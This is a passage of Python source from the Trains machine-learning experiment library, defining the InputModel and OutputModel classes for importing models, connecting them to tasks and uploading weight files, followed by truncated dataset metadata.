\"\"\"\n if extract_archive and self._package_tag in self.tags:\n return self.get_weights_package(return_path=True, raise_on_error=raise_on_error)\n return self.get_weights(raise_on_error=raise_on_error)\n\n def _get_base_model(self):\n if self._base_model:\n return self._base_model\n\n if not self._base_model_id:\n # this shouldn't actually happen\n raise Exception('Missing model ID, cannot create an empty model')\n self._base_model = _Model(\n upload_storage_uri=None,\n cache_dir=get_cache_dir(),\n model_id=self._base_model_id,\n )\n return self._base_model\n\n def _get_model_data(self):\n return self._get_base_model().data\n\n\nclass InputModel(Model):\n \"\"\"\n Load an existing model in the system, search by model id.\n The Model will be read-only and can be used to pre initialize a network\n We can connect the model to a task as input model, then when running remotely override it with the UI.\n \"\"\"\n\n _EMPTY_MODEL_ID = _Model._EMPTY_MODEL_ID\n\n @classmethod\n def import_model(\n cls,\n weights_url, # type: str\n config_text=None, # type: Optional[str]\n config_dict=None, # type: Optional[dict]\n label_enumeration=None, # type: Optional[Dict[str, int]]\n name=None, # type: Optional[str]\n tags=None, # type: Optional[List[str]]\n comment=None, # type: Optional[str]\n is_package=False, # type: bool\n create_as_published=False, # type: bool\n framework=None, # type: Optional[str]\n ):\n # type: (...) -> InputModel\n \"\"\"\n Create an InputModel object from a pre-trained model by specifying the URL of an initial weight files.\n Optionally, input a configuration, label enumeration, name for the model, tags describing the model,\n comment as a description of the model, indicate whether the model is a package, specify the model's\n framework, and indicate whether to immediately set the model's status to ``Published``.\n The model is read-only.\n\n The **Trains Server** (backend) may already store the model's URL. If the input model's URL is not\n stored, meaning the model is new, then it is imported and Trains stores its metadata.\n If the URL is already stored, the import process stops, Trains issues a warning message, and Trains\n reuses the model.\n\n In your Python experiment script, after importing the model, you can connect it to the main execution\n Task as an input model using :meth:`InputModel.connect` or :meth:`.Task.connect`. That initializes the\n network.\n\n .. note::\n Using the **Trains Web-App** (user interface), you can reuse imported models and switch models in\n experiments.\n\n :param str weights_url: A valid URL for the initial weights file. If the **Trains Web-App** (backend)\n already stores the metadata of a model with the same URL, that existing model is returned\n and Trains ignores all other parameters.\n\n For example:\n\n - ``https://domain.com/file.bin``\n - ``s3://bucket/file.bin``\n - ``file:///home/user/file.bin``\n\n :param str config_text: The configuration as a string. This is usually the content of a configuration\n dictionary file. Specify ``config_text`` or ``config_dict``, but not both.\n :type config_text: unconstrained text string\n :param dict config_dict: The configuration as a dictionary. Specify ``config_text`` or ``config_dict``,\n but not both.\n :param dict label_enumeration: Optional label enumeration dictionary of string (label) to integer (value) pairs.\n\n For example:\n\n .. code-block:: javascript\n\n {\n 'background': 0,\n 'person': 1\n }\n :param str name: The name of the newly imported model. (Optional)\n :param tags: The list of tags which describe the model. (Optional)\n :type tags: list(str)\n :param str comment: A comment / description for the model. (Optional)\n :type comment str:\n :param is_package: Is the imported weights file is a package? (Optional)\n\n - ``True`` - Is a package. Add a package tag to the model.\n - ``False`` - Is not a package. Do not add a package tag. (Default)\n\n :type is_package: bool\n :param bool create_as_published: Set the model's status to Published? (Optional)\n\n - ``True`` - Set the status to Published.\n - ``False`` - Do not set the status to Published. The status will be Draft. (Default)\n\n :param str framework: The framework of the model. (Optional)\n :type framework: str or Framework object\n\n :return: The imported model or existing model (see above).\n \"\"\"\n config_text = cls._resolve_config(config_text=config_text, config_dict=config_dict)\n weights_url = StorageHelper.conform_url(weights_url)\n if not weights_url:\n raise ValueError(\"Please provide a valid weights_url parameter\")\n extra = {'system_tags': [\"-\" + ARCHIVED_TAG]} \\\n if Session.check_min_api_version('2.3') else {'tags': [\"-\" + ARCHIVED_TAG]}\n result = _Model._get_default_session().send(models.GetAllRequest(\n uri=[weights_url],\n only_fields=[\"id\", \"name\", \"created\"],\n **extra\n ))\n\n if result.response.models:\n logger = get_logger()\n\n logger.debug('A model with uri \"{}\" already exists. Selecting it'.format(weights_url))\n\n model = get_single_result(\n entity='model',\n query=weights_url,\n results=result.response.models,\n log=logger,\n raise_on_error=False,\n )\n\n logger.info(\"Selected model id: {}\".format(model.id))\n\n return InputModel(model_id=model.id)\n\n base_model = _Model(\n upload_storage_uri=None,\n cache_dir=get_cache_dir(),\n )\n\n from .task import Task\n task = Task.current_task()\n if task:\n comment = 'Imported by task id: {}'.format(task.id) + ('\\n' + comment if comment else '')\n project_id = task.project\n task_id = task.id\n else:\n project_id = None\n task_id = None\n\n if not framework:\n framework, file_ext = Framework._get_file_ext(\n framework=framework,\n filename=weights_url\n )\n\n base_model.update(\n design=config_text,\n labels=label_enumeration,\n name=name,\n comment=comment,\n tags=tags,\n uri=weights_url,\n framework=framework,\n project_id=project_id,\n task_id=task_id,\n )\n\n this_model = InputModel(model_id=base_model.id)\n this_model._base_model = base_model\n\n if is_package:\n this_model._set_package_tag()\n\n if create_as_published:\n this_model.publish()\n\n return this_model\n\n @classmethod\n def load_model(cls, weights_url, load_archived=False):\n # type: (str, bool) -> InputModel\n \"\"\"\n Load an already registered model based on a pre-existing model file (link must be valid).\n\n If the url to the weights file already exists, the returned object is a Model representing the loaded Model\n If there could not be found any registered model Model with the specified url, None is returned.\n\n :param weights_url: valid url for the weights file (string).\n examples: \"https://domain.com/file.bin\" or \"s3://bucket/file.bin\" or \"file:///home/user/file.bin\".\n NOTE: if a model with the exact same URL exists, it will be used, and all other arguments will be ignored.\n :param bool load_archived: If True return registered Model with even if they are archived,\n otherwise archived models are ignored,\n :return Model: InputModel object or None if no model could be found\n \"\"\"\n weights_url = StorageHelper.conform_url(weights_url)\n if not weights_url:\n raise ValueError(\"Please provide a valid weights_url parameter\")\n if not load_archived:\n extra = {'system_tags': [\"-\" + ARCHIVED_TAG]} \\\n if Session.check_min_api_version('2.3') else {'tags': [\"-\" + ARCHIVED_TAG]}\n else:\n extra = {}\n\n result = _Model._get_default_session().send(models.GetAllRequest(\n uri=[weights_url],\n only_fields=[\"id\", \"name\", \"created\"],\n **extra\n ))\n\n if not result or not result.response or not result.response.models:\n return None\n\n logger = get_logger()\n model = get_single_result(\n entity='model',\n query=weights_url,\n results=result.response.models,\n log=logger,\n raise_on_error=False,\n )\n\n return InputModel(model_id=model.id)\n\n @classmethod\n def empty(cls, config_text=None, config_dict=None, label_enumeration=None):\n # type: (Optional[str], Optional[dict], Optional[Dict[str, int]]) -> InputModel\n \"\"\"\n Create an empty model object. Later, you can assign a model to the empty model object.\n\n :param config_text: The model configuration as a string. This is usually the content of a configuration\n dictionary file. Specify ``config_text`` or ``config_dict``, but not both.\n :type config_text: unconstrained text string\n :param dict config_dict: The model configuration as a dictionary. Specify ``config_text`` or ``config_dict``,\n but not both.\n :param dict label_enumeration: The label enumeration dictionary of string (label) to integer (value) pairs.\n (Optional)\n\n For example:\n\n .. code-block:: javascript\n\n {\n 'background': 0,\n 'person': 1\n }\n \"\"\"\n design = cls._resolve_config(config_text=config_text, config_dict=config_dict)\n\n this_model = InputModel(model_id=cls._EMPTY_MODEL_ID)\n this_model._base_model = m = _Model(\n cache_dir=None,\n upload_storage_uri=None,\n model_id=cls._EMPTY_MODEL_ID,\n )\n m._data.design = _Model._wrap_design(design)\n m._data.labels = label_enumeration\n return this_model\n\n def __init__(self, model_id):\n # type: (str) -> None\n \"\"\"\n :param str model_id: The Trains Id (system UUID) of the input model whose metadata the **Trains Server**\n (backend) stores.\n \"\"\"\n super(InputModel, self).__init__(model_id)\n\n @property\n def id(self):\n # type: () -> str\n return self._base_model_id\n\n def connect(self, task):\n # type: (Task) -> None\n \"\"\"\n Connect the current model to a Task object, if the model is preexisting. Preexisting models include:\n\n - Imported models (InputModel objects created using the :meth:`Logger.import_model` method).\n - Models whose metadata is already in the Trains platform, meaning the InputModel object is instantiated\n from the ``InputModel`` class specifying the the model's Trains Id as an argument.\n - Models whose origin is not Trains that are used to create an InputModel object. For example,\n models created using TensorFlow models.\n\n When the experiment is executed remotely in a worker, the input model already specified in the experiment is\n used.\n\n .. note::\n The **Trains Web-App** allows you to switch one input model for another and then enqueue the experiment\n to execute in a worker.\n\n :param object task: A Task object.\n \"\"\"\n self._set_task(task)\n\n if running_remotely() and task.input_model and task.is_main_task():\n self._base_model = task.input_model\n self._base_model_id = task.input_model.id\n else:\n # we should set the task input model to point to us\n model = self._get_base_model()\n # try to store the input model id, if it is not empty\n if model.id != self._EMPTY_MODEL_ID:\n task.set_input_model(model_id=model.id)\n # only copy the model design if the task has no design to begin with\n if not self._task._get_model_config_text():\n task._set_model_config(config_text=model.model_design)\n if not self._task.get_labels_enumeration():\n task.set_model_label_enumeration(model.data.labels)\n\n # If there was an output model connected, it may need to be updated by\n # the newly connected input model\n self.task._reconnect_output_model()\n\n\nclass OutputModel(BaseModel):\n \"\"\"\n Create an output model for a Task (experiment) to store the training results.\n\n The OutputModel object is always connected to a Task object, because it is instantiated with a Task object\n as an argument. It is, therefore, automatically registered as the Task's (experiment's) output model.\n\n The OutputModel object is read-write.\n\n A common use case is to reuse the OutputModel object, and override the weights after storing a model snapshot.\n Another use case is to create multiple OutputModel objects for a Task (experiment), and after a new high score\n is found, store a model snapshot.\n\n If the model configuration and / or the model's label enumeration\n are ``None``, then the output model is initialized with the values from the Task object's input model.\n\n .. note::\n When executing a Task (experiment) remotely in a worker, you can modify the model configuration and / or model's\n label enumeration using the **Trains Web-App**.\n \"\"\"\n\n @property\n def published(self):\n # type: () -> bool\n \"\"\"\n Get the published state of this model.\n\n :return bool: ``True`` if the model is published, ``False`` otherwise.\n \"\"\"\n if not self.id:\n return False\n return self._get_base_model().locked\n\n @property\n def config_text(self):\n # type: () -> str\n \"\"\"\n Get the configuration as a string. For example, prototxt, an ini file, or Python code to evaluate.\n\n :return str: The configuration.\n \"\"\"\n return _Model._unwrap_design(self._get_model_data().design)\n\n @config_text.setter\n def config_text(self, value):\n # type: (str) -> None\n \"\"\"\n Set the configuration. Store a blob of text for custom usage.\n \"\"\"\n self.update_design(config_text=value)\n\n @property\n def config_dict(self):\n # type: () -> dict\n \"\"\"\n Get the configuration as a dictionary parsed from the ``config_text`` text. This usually represents the model\n configuration. For example, from prototxt to ini file or python code to evaluate.\n\n :return dict: The configuration.\n \"\"\"\n return self._text_to_config_dict(self.config_text)\n\n @config_dict.setter\n def config_dict(self, value):\n # type: (dict) -> None\n \"\"\"\n Set the configuration. Saved in the model object.\n\n :param dict value: The configuration parameters.\n \"\"\"\n self.update_design(config_dict=value)\n\n @property\n def labels(self):\n # type: () -> Dict[str, int]\n \"\"\"\n Get the label enumeration as a dictionary of string (label) to integer (value) pairs.\n\n For example:\n\n .. code-block:: javascript\n\n {\n 'background': 0,\n 'person': 1\n }\n\n :return dict: The label enumeration.\n \"\"\"\n return self._get_model_data().labels\n\n @labels.setter\n def labels(self, value):\n # type: (Dict[str, int]) -> None\n \"\"\"\n Set the label enumeration.\n\n :param dict value: The label enumeration dictionary of string (label) to integer (value) pairs.\n\n For example:\n\n .. code-block:: javascript\n\n {\n 'background': 0,\n 'person': 1\n }\n\n \"\"\"\n self.update_labels(labels=value)\n\n @property\n def upload_storage_uri(self):\n # type: () -> str\n return self._get_base_model().upload_storage_uri\n\n def __init__(\n self,\n task=None, # type: Optional[Task]\n config_text=None, # type: Optional[str]\n config_dict=None, # type: Optional[dict]\n label_enumeration=None, # type: Optional[Dict[str, int]]\n name=None, # type: Optional[str]\n tags=None, # type: Optional[List[str]]\n comment=None, # type: Optional[str]\n framework=None, # type: Optional[Union[str, Framework]]\n base_model_id=None, # type: Optional[str]\n ):\n \"\"\"\n Create a new model and immediately connect it to a task.\n\n We do not allow for Model creation without a task, so we always keep track on how we created the models\n In remote execution, Model parameters can be overridden by the Task\n (such as model configuration & label enumerator)\n\n :param task: The Task object with which the OutputModel object is associated.\n :type task: Task\n :param config_text: The configuration as a string. This is usually the content of a configuration\n dictionary file. Specify ``config_text`` or ``config_dict``, but not both.\n :type config_text: unconstrained text string\n :param dict config_dict: The configuration as a dictionary.\n Specify ``config_dict`` or ``config_text``, but not both.\n :param dict label_enumeration: The label enumeration dictionary of string (label) to integer (value) pairs.\n (Optional)\n\n For example:\n\n .. code-block:: javascript\n\n {\n 'background': 0,\n 'person': 1\n }\n\n :param str name: The name for the newly created model. (Optional)\n :param list(str) tags: A list of strings which are tags for the model. (Optional)\n :param str comment: A comment / description for the model. (Optional)\n :param framework: The framework of the model or a Framework object. (Optional)\n :type framework: str or Framework object\n :param base_model_id: optional, model id to be reused\n \"\"\"\n if not task:\n from .task import Task\n task = Task.current_task()\n if not task:\n raise ValueError(\"task object was not provided, and no current task was found\")\n\n super(OutputModel, self).__init__(task=task)\n\n config_text = self._resolve_config(config_text=config_text, config_dict=config_dict)\n\n self._model_local_filename = None\n self._base_model = None\n self._floating_data = create_dummy_model(\n design=_Model._wrap_design(config_text),\n labels=label_enumeration or task.get_labels_enumeration(),\n name=name,\n tags=tags,\n comment='{} by task id: {}'.format('Created' if not base_model_id else 'Overwritten', task.id) +\n ('\\n' + comment if comment else ''),\n framework=framework,\n upload_storage_uri=task.output_uri,\n )\n if base_model_id:\n try:\n _base_model = InputModel(base_model_id)._get_base_model()\n _base_model.update(\n labels=self._floating_data.labels,\n design=self._floating_data.design,\n task_id=self._task.id,\n project_id=self._task.project,\n name=self._floating_data.name or task.name,\n comment=('{}\\n{}'.format(_base_model.comment, self._floating_data.comment)\n if _base_model.comment and self._floating_data.comment else\n (_base_model.comment or self._floating_data.comment)),\n tags=self._floating_data.tags,\n framework=self._floating_data.framework,\n upload_storage_uri=self._floating_data.upload_storage_uri\n )\n self._base_model = _base_model\n self._floating_data = None\n self._base_model.update_for_task(task_id=self._task.id, override_model_id=self.id)\n except Exception:\n pass\n self.connect(task)\n\n def connect(self, task):\n # type: (Task) -> None\n \"\"\"\n Connect the current model to a Task object, if the model is a preexisting model. Preexisting models include:\n\n - Imported models.\n - Models whose metadata the **Trains Server** (backend) is already storing.\n - Models from another source, such as frameworks like TensorFlow.\n\n :param object task: A Task object.\n \"\"\"\n if self._task != task:\n raise ValueError('Can only connect preexisting model to task, but this is a fresh model')\n\n if running_remotely() and task.is_main_task():\n if self._floating_data:\n self._floating_data.design = _Model._wrap_design(self._task._get_model_config_text()) or \\\n self._floating_data.design\n self._floating_data.labels = self._task.get_labels_enumeration() or \\\n self._floating_data.labels\n elif self._base_model:\n self._base_model.update(design=_Model._wrap_design(self._task._get_model_config_text()) or\n self._base_model.design)\n self._base_model.update(labels=self._task.get_labels_enumeration() or self._base_model.labels)\n\n elif self._floating_data is not None:\n # we copy configuration / labels if they exist, obviously someone wants them as the output base model\n if _Model._unwrap_design(self._floating_data.design):\n if not task._get_model_config_text():\n task._set_model_config(config_text=self._floating_data.design)\n else:\n self._floating_data.design = _Model._wrap_design(self._task._get_model_config_text())\n\n if self._floating_data.labels:\n task.set_model_label_enumeration(self._floating_data.labels)\n else:\n self._floating_data.labels = self._task.get_labels_enumeration()\n\n self.task._save_output_model(self)\n\n def set_upload_destination(self, uri):\n # type: (str) -> None\n \"\"\"\n Set the URI of the storage destination for uploaded model weight files.\n Supported storage destinations include S3, Google Cloud Storage), and file locations.\n\n Using this method, files uploads are separate and then a link to each is stored in the model object.\n\n .. note::\n For storage requiring credentials, the credentials are stored in the Trains configuration file,\n ``~/trains.conf``.\n\n :param str uri: The URI of the upload storage destination.\n\n For example:\n\n - ``s3://bucket/directory/``\n - ``file:///tmp/debug/``\n\n :return bool: The status of whether the storage destination schema is supported.\n\n - ``True`` - The storage destination scheme is supported.\n - ``False`` - The storage destination scheme is not supported.\n \"\"\"\n if not uri:\n return\n\n # Test if we can update the model.\n self._validate_update()\n\n # Create the storage helper\n storage = StorageHelper.get(uri)\n\n # Verify that we can upload to this destination\n try:\n uri = storage.verify_upload(folder_uri=uri)\n except Exception:\n raise ValueError(\"Could not set destination uri to: %s [Check write permissions]\" % uri)\n\n # store default uri\n self._get_base_model().upload_storage_uri = uri\n\n def update_weights(\n self,\n weights_filename=None, # type: Optional[str]\n upload_uri=None, # type: Optional[str]\n target_filename=None, # type: Optional[str]\n auto_delete_file=True, # type: bool\n register_uri=None, # type: Optional[str]\n iteration=None, # type: Optional[int]\n update_comment=True # type: bool\n ):\n # type: (...) -> str\n \"\"\"\n Update the model weights from a locally stored model filename.\n\n .. note::\n Uploading the model is a background process. A call to this method returns immediately.\n\n :param str weights_filename: The name of the locally stored weights file to upload.\n Specify ``weights_filename`` or ``register_uri``, but not both.\n :param str upload_uri: The URI of the storage destination for model weights upload. The default value\n is the previously used URI. (Optional)\n :param str target_filename: The newly created filename in the storage destination location. The default value\n is the ``weights_filename`` value. (Optional)\n :param bool auto_delete_file: Delete the temporary file after uploading? (Optional)\n\n - ``True`` - Delete (Default)\n - ``False`` - Do not delete\n\n :param str register_uri: The URI of an already uploaded weights file. The URI must be valid. Specify\n ``register_uri`` or ``weights_filename``, but not both.\n :param int iteration: The iteration number.\n :param bool update_comment: Update the model comment with the local weights file name (to maintain\n provenance)? (Optional)\n\n - ``True`` - Update model comment (Default)\n - ``False`` - Do not update\n\n :return str: The uploaded URI.\n \"\"\"\n\n def delete_previous_weights_file(filename=weights_filename):\n try:\n if filename:\n os.remove(filename)\n except OSError:\n self._log.debug('Failed removing temporary file %s' % filename)\n\n # test if we can update the model\n if self.id and self.published:\n raise ValueError('Model is published and cannot be changed')\n\n if (not weights_filename and not register_uri) or (weights_filename and register_uri):\n raise ValueError('Model update must have either local weights file to upload, '\n 'or pre-uploaded register_uri, never both')\n\n # only upload if we are connected to a task\n if not self._task:\n raise Exception('Missing a task for this model')\n\n if weights_filename is not None:\n # make sure we delete the previous file, if it exists\n if self._model_local_filename != weights_filename:\n delete_previous_weights_file(self._model_local_filename)\n # store temp filename for deletion next time, if needed\n if auto_delete_file:\n self._model_local_filename = weights_filename\n\n # make sure the created model is updated:\n model = self._get_force_base_model()\n if not model:\n raise ValueError('Failed creating internal output model')\n\n # select the correct file extension based on the framework,\n # or update the framework based on the file extension\n framework, file_ext = Framework._get_file_ext(\n framework=self._get_model_data().framework,\n filename=target_filename or weights_filename or register_uri\n )\n\n if weights_filename:\n target_filename = target_filename or Path(weights_filename).name\n if not target_filename.lower().endswith(file_ext):\n target_filename += file_ext\n\n # set target uri for upload (if specified)\n if upload_uri:\n self.set_upload_destination(upload_uri)\n\n # let us know the iteration number, we put it in the comment section for now.\n if update_comment:\n comment = self.comment or ''\n iteration_msg = 'snapshot {} stored'.format(weights_filename or register_uri)\n if not comment.startswith('\\n'):\n comment = '\\n' + comment\n comment = iteration_msg + comment\n else:\n comment = None\n\n # if we have no output destination, just register the local model file\n if weights_filename and not self.upload_storage_uri and not self._task.storage_uri:\n register_uri = weights_filename\n weights_filename = None\n auto_delete_file = False\n self._log.info('No output storage destination defined, registering local model %s' % register_uri)\n\n # start the upload\n if weights_filename:\n if not model.upload_storage_uri:\n self.set_upload_destination(self.upload_storage_uri or self._task.storage_uri)\n\n output_uri = model.update_and_upload(\n model_file=weights_filename,\n task_id=self._task.id,\n async_enable=True,\n target_filename=target_filename,\n framework=self.framework or framework,\n comment=comment,\n cb=delete_previous_weights_file if auto_delete_file else None,\n iteration=iteration or self._task.get_last_iteration(),\n )\n elif register_uri:\n register_uri = StorageHelper.conform_url(register_uri)\n output_uri = model.update(uri=register_uri, task_id=self._task.id, framework=framework, comment=comment)\n else:\n output_uri = None\n\n # make sure that if we are in dev move we report that we are training (not debugging)\n self._task._output_model_updated()\n\n return output_uri\n\n def update_weights_package(\n self,\n weights_filenames=None, # type: Optional[Sequence[str]]\n weights_path=None, # type: Optional[str]\n upload_uri=None, # type: Optional[str]\n target_filename=None, # type: Optional[str]\n auto_delete_file=True, # type: bool\n iteration=None # type: Optional[int]\n ):\n # type: (...) -> str\n \"\"\"\n Update the model weights from locally stored model files, or from directory containing multiple files.\n\n .. note::\n Uploading the model weights is a background process. A call to this method returns immediately.\n\n :param weights_filenames: The file names of the locally stored model files. Specify ``weights_filenames``\n or ``weights_path``, but not both.\n :type weights_filenames: list(str)\n :param weights_path: The directory path to a package. All the files in the directory will be uploaded.\n Specify ``weights_path`` or ``weights_filenames``, but not both.\n :type weights_path: str\n :param str upload_uri: The URI of the storage destination for the model weights upload. The default\n is the previously used URI. (Optional)\n :param str target_filename: The newly created filename in the storage destination URI location. The default\n is the value specified in the ``weights_filename`` parameter. (Optional)\n :param bool auto_delete_file: Delete temporary file after uploading? (Optional)\n\n - ``True`` - Delete (Default)\n - ``False`` - Do not delete\n\n :param int iteration: The iteration number.\n\n :return str: The uploaded URI for the weights package.\n \"\"\"\n # create list of files\n if (not weights_filenames and not weights_path) or (weights_filenames and weights_path):\n raise ValueError('Model update weights package should get either '\n 'directory path to pack or a list of files')\n\n if not weights_filenames:\n weights_filenames = list(map(six.text_type, Path(weights_path).rglob('*')))\n\n # create packed model from all the files\n fd, zip_file = mkstemp(prefix='model_package.', suffix='.zip')\n try:\n with zipfile.ZipFile(zip_file, 'w', allowZip64=True, compression=zipfile.ZIP_STORED) as zf:\n for filename in weights_filenames:\n zf.write(filename, arcname=Path(filename).name)\n finally:\n os.close(fd)\n\n # now we can delete the files (or path if provided)\n if auto_delete_file:\n def safe_remove(path, is_dir=False):\n try:\n (os.rmdir if is_dir else os.remove)(path)\n except OSError:\n self._log.info('Failed removing temporary {}'.format(path))\n\n for filename in weights_filenames:\n safe_remove(filename)\n if weights_path:\n safe_remove(weights_path, is_dir=True)\n\n if target_filename and not target_filename.lower().endswith('.zip'):\n target_filename += '.zip'\n\n # and now we should upload the file, always delete the temporary zip file\n comment = self.comment or ''\n iteration_msg = 'snapshot {} stored'.format(str(weights_filenames))\n if not comment.startswith('\\n'):\n comment = '\\n' + comment\n comment = iteration_msg + comment\n self.comment = comment\n uploaded_uri = self.update_weights(weights_filename=zip_file, auto_delete_file=True, upload_uri=upload_uri,\n target_filename=target_filename or 'model_package.zip',\n iteration=iteration, update_comment=False)\n # set the model tag (by now we should have a model object) so we know we have packaged file\n self._set_package_tag()\n return uploaded_uri\n\n def update_design(self, config_text=None, config_dict=None):\n # type: (Optional[str], Optional[dict]) -> bool\n \"\"\"\n Update the model configuration. Store a blob of text for custom usage.\n\n .. note::\n This method's behavior is lazy. The design update is only forced when the weights\n are updated.\n\n :param config_text: The configuration as a string. This is usually the content of a configuration\n dictionary file. Specify ``config_text`` or ``config_dict``, but not both.\n :type config_text: unconstrained text string\n :param dict config_dict: The configuration as a dictionary. Specify ``config_text`` or ``config_dict``,\n but not both.\n\n :return bool: The status of the update.\n\n - ``True`` - Update successful.\n - ``False`` - Update not successful.\n \"\"\"\n if not self._validate_update():\n return False\n\n config_text = self._resolve_config(config_text=config_text, config_dict=config_dict)\n\n if self._task and not self._task.get_model_config_text():\n self._task.set_model_config(config_text=config_text)\n\n if self.id:\n # update the model object (this will happen if we resumed a training task)\n result = self._get_force_base_model().edit(design=config_text)\n else:\n self._floating_data.design = _Model._wrap_design(config_text)\n result = Waitable()\n\n # you can wait on this object\n return result\n\n def update_labels(self, labels):\n # type: (Dict[str, int]) -> Optional[Waitable]\n \"\"\"\n Update the label enumeration.\n\n :param dict labels: The label enumeration dictionary of string (label) to integer (value) pairs.\n\n For example:\n\n .. code-block:: javascript\n\n {\n 'background': 0,\n 'person': 1\n }\n\n :return:\n \"\"\"\n validate_dict(labels, key_types=six.string_types, value_types=six.integer_types, desc='label enumeration')\n\n if not self._validate_update():\n return\n\n if self._task:\n self._task.set_model_label_enumeration(labels)\n\n if self.id:\n # update the model object (this will happen if we resumed a training task)\n result = self._get_force_base_model().edit(labels=labels)\n else:\n self._floating_data.labels = labels\n result = Waitable()\n\n # you can wait on this object\n return result\n\n @classmethod\n def wait_for_uploads(cls, timeout=None, max_num_uploads=None):\n # type: (Optional[float], Optional[int]) -> None\n \"\"\"\n Wait for any pending or in-progress model uploads to complete. If no uploads are pending or in-progress,\n then the ``wait_for_uploads`` returns immediately.\n\n :param float timeout: The timeout interval to wait for uploads (seconds). (Optional).\n :param int max_num_uploads: The maximum number of uploads to wait for. (Optional).\n \"\"\"\n _Model.wait_for_results(timeout=timeout, max_num_uploads=max_num_uploads)\n\n def _get_force_base_model(self):\n if self._base_model:\n return self._base_model\n\n # create a new model from the task\n self._base_model = self._task.create_output_model()\n # update the model from the task inputs\n labels = self._task.get_labels_enumeration()\n config_text = self._task._get_model_config_text()\n parent = self._task.output_model_id or self._task.input_model_id\n self._base_model.update(\n labels=self._floating_data.labels or labels,\n design=self._floating_data.design or config_text,\n task_id=self._task.id,\n project_id=self._task.project,\n parent_id=parent,\n name=self._floating_data.name or self._task.name,\n comment=self._floating_data.comment,\n tags=self._floating_data.tags,\n framework=self._floating_data.framework,\n upload_storage_uri=self._floating_data.upload_storage_uri\n )\n\n # remove model floating change set, by now they should have matched the task.\n self._floating_data = None\n\n # now we have to update the creator task so it points to us\n if self._task.status not in (self._task.TaskStatusEnum.created, self._task.TaskStatusEnum.in_progress):\n self._log.warning('Could not update last created model in Task {}, '\n 'Task status \\'{}\\' cannot be updated'.format(self._task.id, self._task.status))\n else:\n self._base_model.update_for_task(task_id=self._task.id, override_model_id=self.id)\n\n return self._base_model\n\n def _get_base_model(self):\n if self._floating_data:\n return self._floating_data\n return self._get_force_base_model()\n\n def _get_model_data(self):\n if self._base_model:\n return self._base_model.data\n return self._floating_data\n\n def _validate_update(self):\n # test if we can update the model\n if self.id and self.published:\n raise ValueError('Model is published and cannot be changed')\n\n return True\n\n\nclass Waitable(object):\n def wait(self, *_, **__):\n return True\n", "sub_path": "trains/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 52825, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "typing.TYPE_CHECKING", "line_number": 25, "usage_type": "name"}, {"api_name": "utilities.enum.Options", "line_number": 31, "usage_type": "name"}, {"api_name": "backend_interface.model.Model._unwrap_design", "line_number": 186, "usage_type": "call"}, {"api_name": "backend_interface.model.Model", "line_number": 186, "usage_type": "name"}, {"api_name": "debugging.log.get_logger", "line_number": 243, "usage_type": "call"}, {"api_name": "tempfile.mkdtemp", "line_number": 284, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 288, "usage_type": "attribute"}, {"api_name": "tarfile.open", "line_number": 288, "usage_type": "attribute"}, {"api_name": "zipfile.BadZipfile", "line_number": 293, "usage_type": "attribute"}, {"api_name": "tarfile.ReadError", "line_number": 293, "usage_type": "attribute"}, {"api_name": "pathlib2.Path", "line_number": 301, "usage_type": "call"}, {"api_name": "config.running_remotely", "line_number": 316, "usage_type": "call"}, {"api_name": "backend_interface.Task", "line_number": 320, "usage_type": "argument"}, {"api_name": "abc.abstractmethod", "line_number": 324, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 328, "usage_type": "attribute"}, {"api_name": "six.string_types", "line_number": 340, "usage_type": "attribute"}, {"api_name": "utilities.pyhocon.HOCONConverter.to_hocon", "line_number": 346, "usage_type": "call"}, {"api_name": "utilities.pyhocon.HOCONConverter", "line_number": 346, "usage_type": "name"}, {"api_name": "utilities.pyhocon.ConfigFactory.from_dict", "line_number": 346, "usage_type": "call"}, {"api_name": "utilities.pyhocon.ConfigFactory", "line_number": 346, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 351, "usage_type": "call"}, {"api_name": "utilities.pyhocon.HOCONConverter.to_hocon", "line_number": 352, "usage_type": "call"}, {"api_name": "utilities.pyhocon.HOCONConverter", "line_number": 352, "usage_type": "name"}, {"api_name": "utilities.pyhocon.ConfigFactory.parse_string", "line_number": 352, "usage_type": "call"}, {"api_name": "utilities.pyhocon.ConfigFactory", "line_number": 352, "usage_type": "name"}, {"api_name": "six.string_types", "line_number": 360, "usage_type": "attribute"}, {"api_name": "utilities.pyhocon.ConfigFactory.parse_string", "line_number": 363, "usage_type": "call"}, {"api_name": "utilities.pyhocon.ConfigFactory", "line_number": 363, "usage_type": "name"}, {"api_name": "pyparsing.ParseBaseException", "line_number": 364, "usage_type": "attribute"}, {"api_name": "six.raise_from", "line_number": 366, "usage_type": "call"}, {"api_name": "six.raise_from", "line_number": 368, "usage_type": "call"}, {"api_name": "backend_interface.util.mutually_exclusive", "line_number": 372, "usage_type": "call"}, {"api_name": "six.add_metaclass", "line_number": 102, "usage_type": "call"}, {"api_name": "abc.ABCMeta", "line_number": 102, "usage_type": "attribute"}, {"api_name": "backend_interface.model.Model", "line_number": 423, "usage_type": "call"}, {"api_name": "config.get_cache_dir", "line_number": 425, "usage_type": "call"}, {"api_name": "backend_interface.model.Model._EMPTY_MODEL_ID", "line_number": 441, "usage_type": "attribute"}, {"api_name": "backend_interface.model.Model", "line_number": 441, "usage_type": "name"}, {"api_name": "storage.helper.StorageHelper.conform_url", "line_number": 525, "usage_type": "call"}, {"api_name": "storage.helper.StorageHelper", "line_number": 525, "usage_type": "name"}, {"api_name": "backend_api.Session.check_min_api_version", "line_number": 529, "usage_type": "call"}, {"api_name": "backend_api.Session", "line_number": 529, "usage_type": "name"}, {"api_name": "backend_interface.model.Model._get_default_session", "line_number": 530, "usage_type": "call"}, {"api_name": "backend_interface.model.Model", "line_number": 530, "usage_type": "name"}, {"api_name": "backend_api.services.models.GetAllRequest", "line_number": 530, "usage_type": "call"}, {"api_name": "backend_api.services.models", "line_number": 530, "usage_type": "name"}, {"api_name": "debugging.log.get_logger", "line_number": 537, "usage_type": "call"}, {"api_name": "backend_interface.util.get_single_result", "line_number": 541, "usage_type": "call"}, {"api_name": "backend_interface.model.Model", "line_number": 553, "usage_type": "call"}, {"api_name": "config.get_cache_dir", "line_number": 555, "usage_type": "call"}, {"api_name": "task.Task.current_task", "line_number": 559, "usage_type": "call"}, {"api_name": "task.Task", "line_number": 559, "usage_type": "name"}, {"api_name": "task.id", "line_number": 561, "usage_type": "attribute"}, {"api_name": "task.project", 